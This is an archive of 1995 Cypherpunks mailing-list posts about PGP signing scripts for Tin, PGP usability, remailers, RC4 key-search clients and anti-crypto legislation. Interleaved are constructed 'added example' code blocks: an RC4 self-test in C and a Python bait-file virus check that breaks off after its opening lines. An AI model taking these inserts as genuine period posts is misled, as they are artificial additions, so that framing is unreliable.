# Edit the SIGPATH and TINEDITOR variables to point at your signature
# (if any) and the editor you wish to use for your Tin messages.  Default
# signature will be the file .signature-tin in your $HOME directory.
# Default editor is pico -z -t.
#
# Define SIGPATH=/dev/null if you do not have an ASCII signature to 
# append.

SIGPATH=$HOME/.signature-tin
TINEDITOR='pico -z -t'

# INSTRUCTIONS FOR USING TINSIGN
#
# When you compose a message, you will compose your message as normal.
#
# When you exit your editor (control-X in Pico), you will receive a 
# prompt asking for your PGP passphrase.  Type this in.  
#
# At this point, if you have defined one, your ASCII signature will be 
# appended to the message AFTER the digital signature.
#
# You will then be put into the Tin menu asking if you wish to edit your 
# posting some more, quit the post (ie, abort it), or post it.

### DO NOT TAMPER BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ###

# Define internal variables
	filename=`echo "$2" | cut -f$# -d' '`

# Work in a private directory made by mktemp (needed in addition to the
# programs listed above).  Fixed names such as /tmp/tmp$$ are predictable,
# so another local user could pre-create or symlink them, and under a
# default umask the unsigned text would be readable by others.
	umask 077
	tmpdir=`mktemp -d "${TMPDIR:-/tmp}/tinsign.XXXXXX"` || exit 1
	trap 'rm -rf "$tmpdir"' 0

#Run editor
	$TINEDITOR +$1 "$2"

# Split the headers from the body of the article
	awk '{ print }; /^$/ { exit }' "$filename" > "$tmpdir/msg.hdr"
	awk 'body == 1 { print }; /^$/ { body=1 }' "$filename" > "$tmpdir/msg"

# Remove "--"
	egrep -ve '^--$' "$tmpdir/msg" > "$tmpdir/msg2"
	mv "$tmpdir/msg2" "$tmpdir/msg"

# Sign the message (pgp writes the clearsigned text to msg.asc)
	pgp -sat +comment="PGP Signed with TinSign 1.0" +clearsig=on "$tmpdir/msg"
	if [ $? -eq 0 ]; then
		cat "$tmpdir/msg.hdr" "$tmpdir/msg.asc" > "$filename"
	else
		echo ""; echo "*Error in signing. Aborted."
		sleep 5
	fi

# clean up any files in temp space (the trap above repeats this on exit)
	rm -rf "$tmpdir"

# append your ASCII signature to the message
	echo " " >> "$filename"
	cat "$SIGPATH" >> "$filename"




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.1

-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 19 Jul 95 09:44:55 PDT
To: ab411@detroit.freenet.org
Subject: Re: TIME pathfinder registration
In-Reply-To: <199507180059.UAA12182@detroit.freenet.org>
Message-ID: <9507191640.AA22426@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


What a pain to type.  writecode is easy, and since it's been used once,
should be used again.  Trying three or four passwords to get (vaguely)
anonymous access is silly.
A

| >This was me. The password is "writecode", since Pathfinder didn't allow
| >the login and password to be the same.

| Perhaps in the future people might use "sknuprehpyc" in such cases?
| And of course, don't put the list's email address in.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon McAuliffe <Simon.McAuliffe@Comp.VUW.AC.NZ>
Date: Tue, 18 Jul 95 17:45:53 PDT
To: cypherpunks@toad.com
Subject: Re: RC4 crack
In-Reply-To: <199507182047.QAA03926@bb.hks.net>
Message-ID: <199507190045.MAA28819@lido.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


shamrock@netcom.com (Lucky Green) wrote on Tuesday, 18 Jul 1995:

> >As to the problem of not having 24-7 connectivity, you could either
> >use the WWW page, or the server (it will do this anyway) will keep
> >re-trying to get a socket connect to the master until it succeeds, so
> >when you next go on-line ...  wham it gets through again as
> >connectivity is resumed and says whatever it has been trying to say.
> >We need it to retry in case of network out (or horror) big master
> >falling over, until it gets resumed.
> 
> On many machines that will mean that it will try to initiate a connection
> to the host. Please allow for a manual connect option.

While we're suggesting features, how about including something (on the
networked version) which performs a quick sanity check on any clients
so we know they're not bogus, ie send one or more known plaintext/ciphertext
pairs with corresponding keys to verify the correctness of the compilation.
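
The sanity check suggested above, sketched as an added example that is not part of the original post or of any key-search client discussed on the list: a known-answer self-test the client runs before taking work. The function names and the faulty variant are hypothetical, and the three key/plaintext/ciphertext triples are widely published RC4 test vectors rather than values from the thread.

```c
/* Added example: RC4 known-answer self-test for a key-search client. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

typedef void (*rc4_fn)(const unsigned char *key, size_t keylen,
                       const unsigned char *in, unsigned char *out, size_t len);

/* RC4 key schedule plus keystream XOR.  mix_key=0 models a build fault in
 * which the key bytes never reach the key schedule (constructed fault). */
static void rc4_core(const unsigned char *key, size_t keylen,
                     const unsigned char *in, unsigned char *out, size_t len,
                     int mix_key)
{
    unsigned char S[256], tmp;
    unsigned int i, j = 0;
    size_t n;

    for (i = 0; i < 256; i++)
        S[i] = (unsigned char)i;
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + (mix_key ? key[i % keylen] : 0)) & 0xff;
        tmp = S[i]; S[i] = S[j]; S[j] = tmp;
    }
    i = j = 0;
    for (n = 0; n < len; n++) {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        tmp = S[i]; S[i] = S[j]; S[j] = tmp;
        out[n] = in[n] ^ S[(S[i] + S[j]) & 0xff];
    }
}

static void rc4_reference(const unsigned char *key, size_t keylen,
                          const unsigned char *in, unsigned char *out, size_t len)
{
    rc4_core(key, keylen, in, out, len, 1);
}

/* Stand-in for a miscompiled client: the keystream ignores the key. */
static void rc4_faulty(const unsigned char *key, size_t keylen,
                       const unsigned char *in, unsigned char *out, size_t len)
{
    rc4_core(key, keylen, in, out, len, 0);
}

struct kat {
    const char *key;
    const char *plaintext;
    unsigned char ciphertext[14];   /* only strlen(plaintext) bytes are used */
};

/* Published RC4 test vectors (not taken from the thread). */
static const struct kat VECTORS[] = {
    { "Key", "Plaintext",
      { 0xBB, 0xF3, 0x16, 0xE8, 0xD9, 0x40, 0xAF, 0x0A, 0xD3 } },
    { "Wiki", "pedia",
      { 0x10, 0x21, 0xBF, 0x04, 0x20 } },
    { "Secret", "Attack at dawn",
      { 0x45, 0xA0, 0x1F, 0x64, 0x5F, 0xC3, 0x5B, 0x38,
        0x35, 0x52, 0x54, 0x4B, 0x9B, 0xF5 } },
};
#define NVECTORS (sizeof VECTORS / sizeof VECTORS[0])

/* Returns the number of vectors the implementation gets wrong, checking
 * both directions: encrypt, then decrypt back to the plaintext. */
static int kat_failures(rc4_fn impl)
{
    unsigned char buf[14], back[14];
    int failures = 0;
    size_t v;

    for (v = 0; v < NVECTORS; v++) {
        const struct kat *k = &VECTORS[v];
        const unsigned char *key = (const unsigned char *)k->key;
        const unsigned char *pt = (const unsigned char *)k->plaintext;
        size_t klen = strlen(k->key), len = strlen(k->plaintext);

        impl(key, klen, pt, buf, len);
        impl(key, klen, buf, back, len);
        if (memcmp(buf, k->ciphertext, len) != 0 || memcmp(back, pt, len) != 0)
            failures++;
    }
    return failures;
}

/* Gate: only a build that passes every vector may request keyspace. */
static int client_may_join(rc4_fn impl)
{
    return kat_failures(impl) == 0;
}

int main(void)
{
    printf("reference build: %d failing vector(s), may join: %d\n",
           kat_failures(rc4_reference), client_may_join(rc4_reference));
    printf("faulty build:    %d failing vector(s), may join: %d\n",
           kat_failures(rc4_faulty), client_may_join(rc4_faulty));
    return client_may_join(rc4_reference) ? 0 : 1;
}
```

A self-test of this kind only shows that the build computes RC4 correctly; it says nothing about whether a client honestly searched the keyspace it was given.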





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netchaos@ix.netcom.com (Daniel Gannon )
Date: Wed, 19 Jul 95 12:56:23 PDT
To: cypherpunks@toad.com
Subject: Adding
Message-ID: <199507191954.MAA04876@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I would like to be added to your list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 19 Jul 95 11:40:59 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunk "Zen" victories
Message-ID: <199507191840.NAA18738@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Z. Nuri scribbled:
>
>I was recently marvelling at how much the "cypherpunk agenda"
>is being advanced even in light of what would seem to be setbacks.
>Particularly in the area of anonymous remailers. We now have a very
>major article on remailers and Julf's setup in the NYT that portrays
>them in an unbiased, unhysteria-stricken mode. Also in the article,
>it quotes the police as regretting their falling victim to
>Scientology manipulation and investigating the remailer "without
>cause". A major officer is quoted as saying, roughly, "we are
>going to need a crime before we investigate in the future". 
>

Could you provide a page, date, and title for this article? I would
like to read it but don't get a daily subscription.

Muchas gracias

 Doug Hughes				Engineering Network Services
 doug@eng.auburn.edu			Auburn University



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfmesq@ibm.net (James F. Marshall)
Date: Wed, 19 Jul 95 13:52:28 PDT
To: hayden@krypton.mankato.msus.edu
Subject: Re: "Hey Phil! Stop telling people *not* to use PGP!" (plu
Message-ID: <199507192052.UAA52104@smtp-gw01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


>I've received about 200 requests since Monday from people asking where to
>find PGP, asking about similar scripts for Windoze or Dos or Mac....

If anyone asks about OS/2, a good script is available at
ftp.gibbon.com.

FWIW.

--JFM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Wed, 19 Jul 95 08:19:59 PDT
To: liberty@gate.net
Subject: Re: Root Causes Roots cont.
Message-ID: <2561@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


As my final word on this thread, let me say that if you are really
interested in the 9th Amendment, by far the best legal article on 
the subject  that I know of is Charles L. Black, Jr, On Reading 
and Using the Ninth Amendment.   I have not visited the Cato web 
pages, but their journal tends to be on the shallow side.  I am 
far from LEXIS right now so I can't give you a citation for the 
Black article, but it is brilliant.  It would also make a 
libertarian's hair stand on end.  For hours.
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 19 Jul 95 12:00:14 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help me with my PGP problems!") (fwd)
Message-ID: <Pine.ULT.3.91.950719135958.2882B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 19 Jul 1995, Bryce Wilcox wrote:

[lots of really really good stuff deleted, because I really don't have 
anything good to add to it]

> I am fond of saying that we PGP enthusiasts have two choices ahead of us
> within a couple of years:  either 5,000 enthusiasts using PGP with
> MAXIMAL SECURITY at all times, or 5,000 enthusiasts with MAXIMAL
> SECURITY and 10,000,000 computer-illiterate e-mail users using PGP with
> push-button interfaces and multi-user remote systems.

I said it last week, and I'll say it again.  From a sociological
standpoint, it's those 10,000,000 computer-illiterate e-mail users that we
need to focus all of our efforts towards.  Those 5,000 literate people we 
really don't have to care about.

I will say, and this makes for interesting commentary, over the last week
or so, I've released those simple scripts for Pine (and today for Tin)
that integrate digital signing fairly seamlessly with those programs. 
I've received about 200 requests since Monday from people asking where to
find PGP, asking about similar scripts for Windoze or Dos or Mac, or
thanking me for providing an easier way to do digital signatures.  And
that was a simple sh script!  Imagine if some people with REAL writing 
ability worked on some programs...

Pushing for wide use of digital signatures is one way to get PGP to be a 
"household" name for people writing on the net.  I now sign everything I 
post and mail.  It gets people's attention and interest.  Interest leads 
to use.

> The important thing, of course, is the easy-to-use, e-mail-integrated
> software (version 3.0, I hope?), but it would also help if Zimmermann's
> PGP Doc didn't tell those computer-illiterates to either "become enthusiasts
> or don't use it."

I think the politics of PGP is stagnated at about two years ago or so.  
The demographics are no longer accepting to long technical rants.  
Today's generation of net.user doesn't need 100% security 100% of the
time, what they need is "good" security when they want it, but in a way 
that they don't have to think much about.

Sorry if I'm ranting again about everything I said last week.  I'm in the
process of doing research on social evolution using the net as an example
of accelerated cultural change.  I'm kinda in a specific mindset right now
:-). 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.1

-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 19 Jul 95 11:10:52 PDT
To: wilcoxb@nagina.cs.colorado.edu (Bryce Wilcox)
Subject: Re: "Hey Phil!  Stop telling people *not* to use PGP!"  (plus: "help me with my PGP problems!")
In-Reply-To: <199507191744.LAA04117@nagina.cs.colorado.edu>
Message-ID: <9507191810.AA22858@leonardo.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



|   The problem/gripe is that whenever I try to manipulate public keys on
| my keyring, PGP grabs the first one with User ID "Bryce".  How do I extract,
| edit, sign, etc. the *other* "Bryce" keys on my public keyring?  I tried
| giving PGP the Key ID, which seemed like the most reasonable user interface
| to me, but that didn't work.

	You often need to use 0xKEYID.  I name my keys with expiration
dates in them, so I can simply type 95 or 96 to id a key pretty
uniquely.

pub 1024/E794DA91 1994/06/09 Adam Shostack <adam@bwh.harvard.edu>[Exp July 96] 
sig       876BD629          Adam Shostack <adam@bwh.harvard.edu>[exp June 95]


Also, the MyName option in config.txt is worth looking at.

| Third, how do I set those "PGP-Note" strings that appear in some people's
| PGP Signature Blocks?

pgp -sa +comment="Boycott Clipper!"
or comment in your config.txt


	With regards to docs, I tend to point people at Simson
Garfinkel's pgp book.  Most people find reading a book better than
reading online docs, and Simson does a fairly good job of explaining
everything.


Adam

-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 19 Jul 95 13:11:44 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: cfs on linux - rpcgen broken in slackware distribution!
Message-ID: <Pine.LNX.3.91.950719141024.3126P-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


cpunks,

yesterday i requested some help compiling cfs on my linux system.  well, 
after some serious help i got it to work.

the problem was that my copy of rpcgen was broken.  this was the copy 
installed with the slackware distribution.

damn, this is some sort of never ending contest between my sanity and the 
slackware distribution!

-pat

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER ME for my pgp public key ** crypto for the masses!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 19 Jul 95 13:01:44 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: TINSIGN: Simple script for PGP signing messages in Tin 1.22
In-Reply-To: <Pine.ULT.3.91.950719122403.1187B-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.ULT.3.91.950719150126.5448A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[my duplicate posting deleted]

ARGH!

Sorry folx.  I forgot about that buggy feed.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.1

-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 19 Jul 95 13:08:21 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: "Hey Phil! Stop telling people *not* to use PGP!" (plus: "help mewith my PGP problems!") (fwd)
Message-ID: <9507192005.AA00307@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Robert A. Hayden writes:
>  I said it last week, and I'll say it again.  From a sociological
>  standpoint, it's those 10,000,000 computer-illiterate e-mail users
>  that we need to focus all of our efforts towards.  Those 5,000
>  literate people we really don't have to care about.
[...snip...]
>  Imagine if some people with REAL writing ability worked on some
>  programs...
[...snip...]
>  I think the politics of PGP is stagnated at about two years ago or
>  so.  The demographics are no longer accepting to long technical
>  rants.  Today's generation of net.user doesn't need 100% security
>  100% of the time, what they need is "good" security when they want
>  it, but in a way that they don't have to think much about.

This has been hashed over on the list many, many times in the past.  I  
suspect there are competent programmers out there who want to write  
easy-to-use interfaces for PGP (I know at least one), but there are problems.
To write a good GUI interface (with proper key-management features) on
Windows or Mac, for instance, you need to have access to PGP's internal
crypto routines as well as the routines for reading and writing PGP messages
and key certificates.  The problem is that the PGP 2 code does not have the
internal 'core' routines separated from its command-line interface.

The answers are to either shell out to PGP (which, AFAIK, is what every  
interface except MacPGP does), hack the PGP 2 code, or use PGPTools.

Shelling out to PGP isn't going to cut it for a slick GUI package, especially  
if you want to have a decent key-management interface.  You could do it, but  
it will be slow and kludgy and you will have to change it all when PGP 3  
comes out.

Hacking PGP would be a major effort.  Additionally, there is risk of  
introducing a subtle flaw in the crypto routines.  However, the main killer  
is that PGP 3 is going to have a brand new key-ring format along with many  
other enhancements, fixes, and other changes to the crypto code.  All of the  
work will have to be done again to bring the interface up to date when PGP 3  
is released, which could be within 6 months (who knows?).

PGPTools is buggy and not supported.  Any effort to bring PGPTools up to a  
stable level would likely be thrown away when PGP 3 is released.

The real solution is that PGP 3 will have all of its core routines in a  
separate library with a stable API specifically for the purpose of writing  
slick interfaces.  So basically all of the would-be PGP interface developers  
are waiting for beta releases of the library.  Unfortunately, this has been  
the situation for almost two years now.  By now the PGP 2 code could have  
been completely turned into a library with a clean API and no command-line  
interface remnants, but developers have been discouraged by the promise of  
PGP 3 coming out 'RSN'...


andrew
...still waiting for pgp 3 news...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Wed, 19 Jul 95 13:31:41 PDT
To: stewarts@ix.netcom.com
Subject: bi-directional dining cryptographers
In-Reply-To: <199507180649.XAA25432@ix3.ix.netcom.com>
Message-ID: <199507192027.AA25383@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


I know that it would be difficult. In _that_ part I was just
playing around. It's at least as valid as mechanically-written
letters as a list topic.

(Well, I thought it was a funny if dreadful idea).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 19 Jul 95 16:33:14 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: cypherpunk "Zen" victories
In-Reply-To: <199507191703.KAA20332@netcom23.netcom.com>
Message-ID: <Pine.SUN.3.91.950719162702.8888A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I'm almost at a loss for words.  I have had my troubles with, and
suspicions of, "Vladimir Z. Nuri."  Right now, though, I don't
care if he is the DetMan or not.  His most recent posting, 
"cypherpunk `Zen' victories," was dead bang right on.  For those
of you who may have deleted it without reading it, I have 
included it below.  It's very, very good.

Hey, if it really is you, Larry, stay on the medication (or off 
it, as the case may be).


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


On Wed, 19 Jul 1995, Vladimir Z. Nuri wrote:

> I was recently marvelling at how much the "cypherpunk agenda"
> is being advanced even in light of what would seem to be setbacks.
> Particularly in the area of anonymous remailers. We now have a very
> major article on remailers and Julf's setup in the NYT that portrays
> them in an unbiased, unhysteria-stricken mode. Also in the article,
> it quotes the police as regretting their falling victim to
> Scientology manipulation and investigating the remailer "without
> cause". A major officer is quoted as saying, roughly, "we are
> going to need a crime before we investigate in the future". 
> 
> Look what we got out of this: 
> 
> 1) incredible positive publicity for Julf,
> Hero of the Net 
> 
> 2) introduction of the concept of anonymous remailers
> to the layman 
> 
> 3) police awareness. increased reluctance to go on anonymous remailer
> witchhunts. advice to other police to do the same.
> 
> 4) only *one* address was compromised on Julf's system. a small price
> to pay for all this
> 
> 5) Time Magazine also did an article on Julf a few months ago and
> this compromise in identity. *astonishing* publicity.
> 
> All in all, I would say the effect was an overall "net positive".
> It reminds me of a zen-like saying, "sometimes you lose by winning
> and win by losing". It would seem on the face of it that the
> Helsingius Affair was a debacle from the point of view of pseudonymity.
> However I would consider it an extraordinary success. 
> 
> The major foes of pseudonymity have so far been misguided police forces 
> in Finland, who now say they resent the solicitude of the US into their own
> affairs, and would not be so eager to cooperate in the future;
> another foe is a radical religious cult that is finding its own
> set of 20th century heretics, and attempting to excommunicate them.
> In the meantime, with each exposure, the idea of anonymity and
> pseudonymity is gaining powerful friends.
> 
> Also, a long time ago a major foe of anonymity was Dick Depew. An
> article came out on him in the WSJ that made him look awfully
> silly.  He is roundly considered one of the more legendary net
> crackpots today. 
> 
> ===
> 
> I'd also like to point out that the recent Rimm job affair is
> another "net positive" for the net. Rimm has been so utterly
> thoroughly discredited and blackened by his own personality
> and background, as reported by Brock Meeks recently, it is 
> amazingly hilarious. Rimm has become the laughingstock of
> cyberspace in the way that Canter and Siegel were.
> 
> We could not have asked for a better setup for embarrassing
> and humiliating the media into realizing the core issues
> involving pornography on the internet. If someone did this
> intentionally, it would have been considered a brilliant
> trap. Time and DeWitt have been savaged by very reputable people, and 
> I'm sure they consider the article a fiasco from a credibility standpoint.
> Any magazine that covers pornography in cyberspace in the future
> will be very gunshy and will not be so flippant, if they can
> stand poking the hornet's nest at all.
> 
> ===
> 
> Another area is in the bills that are being introduced in congress.
> It would seem these are a fiasco from the point of view of
> those interested in cyberspace. But there are backlashes even
> in congress. Was it Markey that introduced a bill that made
> cyberspace off limits to future draconian legislation? All this
> also forces legislators to figure out what the hell they are dealing
> with, and they are finding out what their own authority in the 
> matter is. I think the wise ones may figure out that if they
> don't play nice, we may take our marbles away and go play with
> someone else. D.Frissell said something profound in his letter
> to the editor, "Congress thinks the Internet can be controlled.
> We who built it, and continue to build it, think it cannot be.
> It will be interesting to see who is right". His comparing it
> with the ideas in the declaration of independence, that "when
> a government no longer serves the people, they have a right to
> overthrow it", is extremely apropos in cyberspace, where it
> may be more possible than ever for those who desire freedom
> to make those who are opposed to it, completely irrelevant.
> 
> T.May suggests that we just give up the fight in congress, saying
> that bills can be introduced faster than we can fight them. I
> agree with the observation but not the conclusion. 
> Bills have a very hard time getting to be law.
> They are very fragile in initial stages, and at these points they
> can indeed be killed with a little pressure in the right spots.
> We are learning where those spots are.
> 
> At this point I think it is not in the interests of those promoting
> cyberspace to try to evade congress. So far, it has not proved itself
> to be completely hostile to the point of trying to shut down cyberspace
> to the degree it does not fit its own agenda. And as long as they
> are not outright enemies, some could be turned into powerful
> promoters. The idea of abandoning educating/influencing congress 
> entirely seems like a kind of unhealthy nihilism to me. There are
> allies in congress and there are people listening there. Their 
> unawareness seems amazingly proportional to the cluelessness of
> the general population about cyberspace (and I see extremely
> encouraging signs both are rapidly diminishing).
> 
> The bills seem to be becoming more desperate and draconian in their
> language. This is a sign of fear and dread on the side that seeks
> to regulate bits. They are in a tricky position, because the more
> draconian the language, the less likely it is to be passed and
> taken seriously. People become suspicious and hypersensitive to
> the infractions. To a large degree, many parts in the government
> only gain their power through secrecy. As people become more aware
> of the power flow, they disrupt and seize it themselves. Every bill
> that has more desperate language is the other side revealing
> their secret agenda, to control thought, which I think reasonable 
> people are increasingly considering and recognizing as bogus
> and bankrupt.
> 
> Congress will eventually polarize into being generally promoting
> of cyberspace, or outrightly hostile to it. Cyberspace will
> inevitably escape its grip if congress goes in this direction. To use
> Zen analogies again, there is the idea that water is the most
> powerful force on the earth, because it simply flows around
> that which opposes it. I find that cyberspace is wholly analogous.
> In fact it seems to me that cyberspace would give Lao Tzu
> a whole new cuttingly apt metaphor for his philosophies!!
> 
> ===
> 
> So the next time that you rant about how some bill or another
> means the Death of the Net, or the police investigating a remailer
> means the downfall of cryptoanarchy, or a lousy article with a
> zillion distortions comes out, think again. The greatest cypherpunk
> victories are emerging through what would appear at first to be the 
> "blackest" moments.
> 
> viva la cryptoanarchy!!!
> 
> 
> ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
> \  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
>  \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Wed, 19 Jul 95 14:51:48 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507140629.XAA21600@ix3.ix.netcom.com>
Message-ID: <Pine.BSD/.3.91.950719173416.21971E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Bill Stewart wrote:

> >Eh, what do "virus hackers" have to do with encryption, why is it these 
> >morons justify the destruction of encryption by mentioning hackers and 
> >viruses?
> 
> You're parsing the title wrong.  It's an act to support racketeering
> through opposition to electronic communications.  What viruses have to
> do with encryption is that encryption makes it easier to prevent viruses,
> and Senator Grassley wants to stop that.  And the term "strong" was used in its
> correct engineering meaning, as in "It's a vessel of fertilizer which is
> very strong and promotes growth".

Erm, not quite.  Stealth viruses supposedly use "encryption" to hide 
themselves, but then, I shouldn't mention this, might give El Federale a 
bit more fuel to burn us with.  (But even these beasts can be caught 
easily if you know how... i.e. create a large executable that does 
nothing but quit to the operating system.  Run it every day and compare 
it every day.  The day it changes is the day a virus infected it.)

Still, you could write beneficial viruses, or virus like programs that 
are beneficial in nature in some way. KOH for instance?

However, none of the above has any iota of anything to do with linking 
the four horsemen of LEA's to crypto in any real-life-already-proven 
situation in any significant numbers.  Banning crypto for EVERYONE in 
order to catch maybe, what, two zit-bearing kids hoarding beaver shots 
downloaded from alt.bin.erotica.pix a year is a tremendous loss of 
everyone's privacy.

> Hey, Julf, we've got your number!  And we're making sure nobody's got any
> encryption to prevent fraud with.

Hell, at this point, my guess is that the mafia(s) doesn't use crypto, or 
that if it does, it can be caught via other means.  A strong, well 
developed crypto system in use by the mafia would more than likely never 
happen... not until mobsters get into computers.  Ditto for terrorists.

If they did use crypto, I suspect they wouldn't get caught.  (For the 
paranoid, assuming they used crypto, and they didn't get caught, then the 
FBI or other TLA is doing the same as the gov't in Fahrenheit 451... 
pick someone else, and jail them.  Otherwise, how do you explain all the 
jailbird mobsters?)

To LEA's out there:  Get a life, get off the net and go bust some 
murderers.  Stop attacking easy targets.  Do your jobs.  Confront the 
real criminals.  What's the matter?  Is it easier to go after crypto 
geeks than it is to arrest drug dealers who shoot back?

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/
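
The bait-file check described in the message above (keep a do-nothing executable and compare it every day), as an added example that is not part of the original post. The file names, the 64 KiB size, the two-byte DOS exit stub and the status labels are assumptions of this example, and it assumes the comparison reads the true bytes on disk and that the baseline is stored where an infected system cannot rewrite it.

```python
import hashlib
import json
import os
import tempfile

# Constructed bait contents: a DOS .COM-style stub (INT 20h, "return to the
# operating system") padded with zeros so the file is large.
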